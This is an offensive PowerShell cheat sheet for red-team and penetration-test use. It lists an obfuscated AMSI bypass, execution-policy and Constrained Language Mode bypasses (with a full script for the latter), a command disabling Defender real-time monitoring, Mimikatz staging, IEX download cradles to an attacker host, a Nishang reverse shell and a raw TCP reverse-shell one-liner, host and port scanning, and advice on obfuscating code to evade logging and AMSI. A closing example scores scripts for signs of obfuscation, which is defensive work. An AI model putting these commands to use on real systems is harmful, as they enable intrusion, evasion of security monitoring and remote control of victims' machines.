Offensive PowerShell

Pass Creds

# If you have RDP access and can get an interactive prompt
$cred = Get-Credential Domain\Username
Invoke-Command -Credential $cred -ComputerName x -ScriptBlock {whoami}

# If you are over C2 and can't get an interactive prompt, build the credential object inline
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); Invoke-Command -ComputerName 192.168.144.197 -Credential $cred -ScriptBlock {whoami}

AMSI Bypass

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

This is an obfuscated form of the classic reflection bypass: it uses [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') to fetch the non-public static field amsiInitFailed and sets it to $true, so the session behaves as if AMSI failed to initialise and scanning is skipped. The plain form is heavily signatured, and this exact obfuscated string has been shared widely, so expect to re-obfuscate it.

Execution Policy

powershell -ep bypass

Execution policy is a safety feature, not a security boundary: -ExecutionPolicy Bypass applies to that process only and changes nothing in the registry.

Help

Get-Help

Checking Language Mode

$ExecutionContext.SessionState.LanguageMode

In ConstrainedLanguage mode you usually cannot call a function interactively after dot-sourcing its script, so append the call to the end of the script file instead. E.g. put a line containing Invoke-Mimikatz at the end of Invoke-Mimikatz.ps1 so the function runs when the script itself executes.

Disabling Constrained Language Mode

Note: this only works when the mode is enforced locally through the __PSLockdownPolicy environment variable (two underscores), not when it comes from an AppLocker/WDAC policy. setx /M writes the machine-wide variable, so it needs an elevated prompt, and only PowerShell processes started after the change pick up the new value; the current session keeps the mode it started with.

# Check (4 = constrained, 8 = unconstrained)
$env:__PSLockdownPolicy

# Change
setx __PSLockdownPolicy "8" /M
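The check-change-verify procedure as one script, added here as an example and not taken from the original page. It assumes an elevated prompt and that CLM is being enforced by the variable rather than by AppLocker/WDAC; the function names and the registry read are this example's own choices.

```powershell
# Added example, not from the original page: check, change and verify the
# __PSLockdownPolicy override. Run from an elevated prompt. It does nothing
# useful when CLM is enforced by AppLocker/WDAC rather than this variable.
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'

function Get-LockdownState {
    # Read the machine-wide value from the registry: $env:__PSLockdownPolicy
    # only shows what this process inherited when it started, so it is stale
    # after a setx /M made from another window.
    $value = (Get-ItemProperty -Path $regPath -Name '__PSLockdownPolicy' -ErrorAction SilentlyContinue).__PSLockdownPolicy
    [pscustomobject]@{
        CurrentSessionMode = $ExecutionContext.SessionState.LanguageMode
        MachinePolicy      = $value
        # PowerShell only enforces CLM when bit 0x4 of the value is set,
        # which is why 8 (or deleting the variable) lifts it
        EnforcedByVariable = [bool]($value -and (([int]$value -band 4) -eq 4))
    }
}

function Set-LockdownPolicy {
    param([Parameter(Mandatory)][ValidateSet('4','8')][string]$Value)
    # Machine scope, same as the page's "setx __PSLockdownPolicy 8 /M"; needs admin rights.
    setx __PSLockdownPolicy $Value /M | Out-Null
    # Also update this process so any child it spawns inherits the new value.
    $env:__PSLockdownPolicy = $Value
}

function Test-NewProcessLanguageMode {
    # The running session keeps the mode it started with; only a fresh
    # powershell.exe evaluates the policy again, so verify in a child process.
    & powershell.exe -NoProfile -NonInteractive -Command '$ExecutionContext.SessionState.LanguageMode'
}

Get-LockdownState
Set-LockdownPolicy -Value '8'
Get-LockdownState              # MachinePolicy now 8, EnforcedByVariable False, session mode unchanged
Test-NewProcessLanguageMode    # FullLanguage if the variable was the only enforcement
```

If the child process still reports ConstrainedLanguage after the change, the mode is coming from AppLocker/WDAC (check Get-AppLockerPolicy -Effective below) and this variable will not help.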

AppLocker Policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Requires administrator rights, and is silently ignored when Tamper Protection is enabled. Disabling real-time protection is logged (Windows Defender Operational log, event 5001), so defenders will see it.

Copy File to target

# Over SMB to an admin share
Copy-Item .\Invoke-Mimikatz.ps1 '\\target.local\c$\Program Files'

# Over an existing PSRemoting session ($sess from New-PSSession)
Copy-Item C:\file C:\Users\target\ -ToSession $sess
Copy-Item C:\Users\target\file C:\ -FromSession $sess

Reverse Shell Nishang

powershell.exe iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443

You may need to edit the Nishang script first so that the function name you call matches the one defined in the file (for example if it was renamed to dodge signatures).

Reverse Shell Listener

Import-Module .\powercat.ps1
powercat -l -v -p 443

Reverse Shell One Liner

$client = New-Object System.Net.Sockets.TCPClient("172.16.1.23",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

IEX

# Download cradle with Invoke-WebRequest, then call a function from the script
powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2

# Download cradle with WebClient
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1'))

Ping Sweep

# Sweep hosts in a /24 subnet
1..255 | % {"192.168.1.$($_): $(Test-Connection -Count 1 -ComputerName 192.168.1.$($_) -Quiet)"}

Testing Ports

Test-NetConnection -ComputerName <name> -Port <port>

# Nishang (the switch is -ScanPort; -Ports takes a comma-separated list)
Invoke-PortScan -StartAddress <IP> -EndAddress <IP> [-ResolveHost] [-ScanPort] [-Ports <port,port>]

Obfuscation

Done well, obfuscation defeats signature matching on script block logs, the warning-level automatic logging of suspicious script blocks, and AMSI. As a very simple example, the AMSI bypass above already shows how GetField becomes g`etf`iElD to slip past the warning-level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel Bohannon (https://github.com/danielbohannon) are very useful for implementing obfuscation.

Obfuscated scripts can be spotted by comparing characteristics such as variable names, function names, character frequency, distribution of language operators and entropy. Revoke-Obfuscation (https://github.com/danielbohannon/Revoke-Obfuscation) is one such tool for identifying obfuscated scripts from event logs. Bonus: to avoid being flagged as obfuscated, use minimal obfuscation: identify the exact signature that gets detected and obfuscate only that part of the script. See: https://cobbr.io/PSAmsi-Minimizing-Obfuscation-To-Maximize-Stealth.html
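To make the detection side concrete, here is a small scorer in the spirit of the characteristics listed above (entropy, symbol density, backtick and -f abuse). It is an added example, not code from the original page or from Revoke-Obfuscation; the function names, the thresholds and the two sample strings are this example's own assumptions, and the thresholds should be tuned against your own baseline of legitimate scripts.

```powershell
# Added example, not from the original page: score PowerShell script text for
# obfuscation indicators of the kind Revoke-Obfuscation compares. Thresholds
# are assumptions to be tuned against a baseline of your environment's scripts.

function Get-ShannonEntropy {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Text)
    if ($Text.Length -eq 0) { return 0.0 }
    $counts = @{}
    foreach ($c in $Text.ToCharArray()) { $counts[$c] = 1 + [int]$counts[$c] }
    $entropy = 0.0
    foreach ($n in $counts.Values) {
        $p = $n / $Text.Length
        $entropy -= $p * [math]::Log($p, 2)
    }
    [math]::Round($entropy, 3)
}

function Test-ObfuscatedScript {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$ScriptText,
        [double]$EntropyThreshold = 5.0,        # assumption: tune per environment
        [double]$SymbolRatioThreshold = 0.30    # assumption: tune per environment
    )
    process {
        $len         = $ScriptText.Length
        $entropy     = Get-ShannonEntropy -Text $ScriptText
        $symbols     = [regex]::Matches($ScriptText, '[^A-Za-z0-9\s]').Count
        $symbolRatio = if ($len) { [math]::Round($symbols / $len, 3) } else { 0 }
        # Backticks inside identifiers ("GET`TY`Pe") and chains of -f format
        # strings are classic Invoke-Obfuscation tells; ordinary scripts rarely
        # contain more than a handful of either.
        $ticks   = [regex]::Matches($ScriptText, '`').Count
        $formats = [regex]::Matches($ScriptText, '-[fF]\s*[''"]').Count

        $reasons = @()
        if ($entropy -ge $EntropyThreshold)         { $reasons += "entropy=$entropy" }
        if ($symbolRatio -ge $SymbolRatioThreshold) { $reasons += "symbolRatio=$symbolRatio" }
        if ($ticks -ge 4)                           { $reasons += "backticks=$ticks" }
        if ($formats -ge 3)                         { $reasons += "formatOps=$formats" }

        [pscustomobject]@{
            Length      = $len
            Entropy     = $entropy
            SymbolRatio = $symbolRatio
            Backticks   = $ticks
            FormatOps   = $formats
            Suspicious  = ($reasons.Count -gt 0)
            Reasons     = ($reasons -join ', ')
        }
    }
}

# Constructed samples (not real log data): an ordinary admin one-liner and a
# fabricated assignment in the style of the AMSI bypass one-liner on this page.
$samples = @(
    'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id',
    'sET-ItEM (''V''+''aR''+''IA''+''blE:x'') ([TYpE]("{1}{0}" -F''F'',''rE''));(GeT-VariaBle x -VaL)."A`ss`Embly"."GET`TY`Pe"(("{2}{0}{1}" -f''Auto'',''mation'',''System.Management.''))'
)
$samples | Test-ObfuscatedScript | Format-Table -AutoSize

# To score real script block logs instead of the constructed samples (event
# 4104 carries the script text in its third property):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Test-ObfuscatedScript | Where-Object Suspicious
```

The second sample is flagged on the backtick count (four of them in two identifiers) regardless of where the entropy threshold lands; the first sample trips none of the rules. Note the flip side the text describes: an attacker who obfuscates only the few tokens that match a signature keeps all of these scores near the baseline, which is exactly why minimal obfuscation is harder to catch than wholesale Invoke-Obfuscation output.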